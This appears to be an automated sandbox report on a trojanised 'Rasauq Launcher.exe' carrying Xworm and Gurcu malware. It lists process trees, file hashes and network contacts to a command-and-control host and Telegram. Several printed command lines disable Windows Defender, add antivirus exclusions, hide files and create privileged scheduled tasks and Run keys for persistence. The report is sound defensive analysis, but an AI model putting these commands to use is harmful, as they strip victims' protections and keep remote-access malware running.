Malware Analysis Report

2025-04-13 12:20

Sample ID 250320-mqf4zsvjt5
Target Rasauq Launcher.exe
SHA256 9fc53dcefce749b23c8f907dc44d498d15058a5b2cedb7c94e1cd42c88176c2f
Tags
xworm defense_evasion execution persistence rat trojan gurcu discovery evasion exploit privilege_escalation ransomware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9fc53dcefce749b23c8f907dc44d498d15058a5b2cedb7c94e1cd42c88176c2f

Threat Level: Known bad

The file Rasauq Launcher.exe was found to be: Known bad.

Malicious Activity Summary

xworm defense_evasion execution persistence rat trojan gurcu discovery evasion exploit privilege_escalation ransomware stealer

Xworm

Xworm family

Modifies security service

Gurcu, WhiteSnake

Contains code to disable Windows Defender

Gurcu family

Detect Xworm Payload

Modifies Windows Defender DisableAntiSpyware settings

Disables service(s)

Modifies boot configuration data using bcdedit

Possible privilege escalation attempt

Stops running service(s)

Command and Scripting Interpreter: PowerShell

Disables Task Manager via registry modification

Modifies Windows Firewall

Drops file in Drivers directory

Sets file to hidden

Manipulates Digital Signatures

Command and Scripting Interpreter: PowerShell

Disables RegEdit via registry modification

Checks computer location settings

Executes dropped EXE

Drops startup file

Loads dropped DLL

Modifies file permissions

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Power Settings

Drops file in System32 directory

Sets desktop wallpaper using registry

Launches sc.exe

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Browser Information Discovery

Event Triggered Execution: Netsh Helper DLL

Delays execution with timeout.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Views/modifies file attributes

Suspicious use of FindShellTrayWindow

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

Modifies registry class

Uses Task Scheduler COM API

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Checks processor information in registry

Kills process with taskkill

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-03-20 10:39

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-20 10:39

Reported

2025-03-20 10:42

Platform

win7-20241010-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Xworm family

xworm

Sets file to hidden

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\attrib.exe N/A
N/A N/A C:\Windows\System32\attrib.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Realtek Audio Driver Host\\$77RealtekAudioDriverHost.exe\"" C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr" C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Enumerates physical storage devices

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2868 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
PID 2868 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
PID 2868 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
PID 2868 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
PID 2868 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
PID 2868 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
PID 2868 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe C:\Windows\system32\cmd.exe
PID 2868 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe C:\Windows\system32\cmd.exe
PID 2868 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe C:\Windows\system32\cmd.exe
PID 2060 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2060 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2060 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2060 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2060 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2060 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2060 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2060 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2060 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2060 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2060 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2060 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2060 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\schtasks.exe
PID 2060 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\schtasks.exe
PID 2060 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\schtasks.exe
PID 2204 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe C:\Windows\System32\attrib.exe
PID 2204 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe C:\Windows\System32\attrib.exe
PID 2204 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe C:\Windows\System32\attrib.exe
PID 2204 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe C:\Windows\System32\attrib.exe
PID 2204 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe C:\Windows\System32\attrib.exe
PID 2204 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe C:\Windows\System32\attrib.exe
PID 2204 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe C:\Windows\system32\cmd.exe
PID 2204 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe C:\Windows\system32\cmd.exe
PID 2204 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe C:\Windows\system32\cmd.exe
PID 580 wrote to memory of 2724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 580 wrote to memory of 2724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 580 wrote to memory of 2724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 580 wrote to memory of 1712 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe
PID 580 wrote to memory of 1712 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe
PID 580 wrote to memory of 1712 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe
PID 1712 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\system32\schtasks.exe
PID 1712 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\system32\schtasks.exe
PID 1712 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\system32\schtasks.exe
PID 1712 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\system32\schtasks.exe
PID 1712 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\system32\schtasks.exe
PID 1712 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\system32\schtasks.exe
PID 1712 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\system32\schtasks.exe
PID 1712 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\system32\schtasks.exe
PID 1712 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\system32\schtasks.exe
PID 1712 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1712 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1712 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1712 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\System32\schtasks.exe
PID 1712 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\System32\schtasks.exe
PID 1712 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe C:\Windows\System32\schtasks.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\attrib.exe N/A
N/A N/A C:\Windows\System32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe

"C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe"

C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe

"C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"

C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe

"C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\Launch.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe'

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Rasauq SoftWorks.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Service.scr'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Service.scr'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Service" /tr "C:\Users\Admin\AppData\Local\Windows Host Service.scr"

C:\Windows\System32\attrib.exe

"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host"

C:\Windows\System32\attrib.exe

"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpC4C5.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"

C:\Windows\system32\schtasks.exe

"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe

C:\Windows\system32\schtasks.exe

"schtasks.exe" /Create /SC ONCE /TN "$77RealtekAudioDriverHost.exe" /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe \"\$77RealtekAudioDriverHost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST

C:\Windows\system32\schtasks.exe

"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "RealtekAudioDriverHost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00

C:\Windows\system32\taskeng.exe

taskeng.exe {CAE06032-FC22-4ED6-80A7-81342CA70EB4} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 looking-brings.gl.at.ply.gg udp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 tcp

Files

memory/2868-0-0x000007FEF5A53000-0x000007FEF5A54000-memory.dmp

memory/2868-1-0x000000013F7B0000-0x000000013F7C8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe

MD5 12a225de8199d2a31f049a6f300d8cfa
SHA1 24819a452cf1db15167a52b12f258d27baacbd6e
SHA256 1399d955881d9db34cbe261c117818a7933a1cc7c8cdabcff8fc22c880053801
SHA512 3e321ac6e35b83e0645611721354a03358da7dde8bc42f761e258f87fa2ae8a33c3778aa48b10e0ead87331eded7240b7134f9c05333a823a53258f7a52cac32

C:\Users\Admin\AppData\Local\Temp\Launch.bat

MD5 41bded52aa489cdea31a174f89bca818
SHA1 da072fb11e72d2762f96d0f901d7ef7bca17218d
SHA256 2172bb0729d91bcf777bbdd0c42dae9c71de0f1251d165655f551673bf622d59
SHA512 d0fa53492e783e627186d96dcf3ffcecc10f8895bd42a16f4946c34de6e4ec2bc156bab0e070ec0ebf9492f394d11d4c7929df1b57ca59cb6e11a566de3a6dd9

C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe

MD5 7091469b8f2213255ba3c2870a60c7eb
SHA1 17e501e4900bf5dacc5cb0424db87d2ce7a89880
SHA256 d63b09f1a44ed10ff2e6aa558ab494ad561066fff13de330eae87e6749a0e3d7
SHA512 f67a4244cf2f4c6fdc728441d85e4e3d6cea3fd28fcc2b21aefc385257d3ad4eb177ff58acb07621b6fb6d4c331b7df80f5a9bd7a53c5d54bb91f000138223b8

memory/2060-20-0x0000000000BD0000-0x0000000000BEA000-memory.dmp

memory/2204-22-0x000000013FBF0000-0x000000013FBFE000-memory.dmp

memory/2868-24-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp

memory/2060-25-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp

memory/2756-30-0x000000001B310000-0x000000001B5F2000-memory.dmp

memory/2756-31-0x0000000001E50000-0x0000000001E58000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 23f38ac0f2cdb8126c995b081a3b3918
SHA1 614d4328dcf6206c9ee9a0b33887fadf8f7a594d
SHA256 381083c072e1be62f9facb85c4c9f018dfb44a5c279f60c2bcd62c6cc149feaa
SHA512 4d607de53850331f31b27344999b6d8fe9d9c6072171ec1a10d7e0ee141e5e1aa0de4d1cbc609af95f223e6bdb40ed7c4016c540674096e4503d9524fb2edcf4

memory/2988-37-0x000000001B1F0000-0x000000001B4D2000-memory.dmp

memory/2988-38-0x0000000001F90000-0x0000000001F98000-memory.dmp

memory/2060-51-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpC4C5.tmp.bat

MD5 458e649b3b89a944fea622defdc5b421
SHA1 a953579dc1a96e82e9226715f4df44495916e20d
SHA256 dbe59a4cdaab22206b48ec77a5694c2aec8bb61608a5131fd530b0990d7e9bf4
SHA512 9b7207530ab99f53b1303706d15573c445f493e1fb66720ea663a237fa4a5ec88e60c513db5764f122dbc23a2034069f787ecf40bc97ee66dc041517c30ff14f

memory/1712-66-0x000000013F0C0000-0x000000013F0CE000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-20 10:39

Reported

2025-03-20 10:42

Platform

win10v2004-20250314-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Disables service(s)

defense_evasion execution

Gurcu family

gurcu

Gurcu, WhiteSnake

stealer gurcu

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A

Modifies security service

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Xworm

trojan rat xworm

Xworm family

xworm

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Disables RegEdit via registry modification

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

defense_evasion

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\cmd.exe N/A

Manipulates Digital Signatures

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Sets file to hidden

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\attrib.exe N/A
N/A N/A C:\Windows\System32\attrib.exe N/A

Stops running service(s)

defense_evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat C:\Windows\system32\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat C:\Windows\system32\cmd.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr" C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Realtek Audio Driver Host\\$77RealtekAudioDriverHost.exe\"" C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Service C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\"" C:\Windows\system32\reg.exe N/A

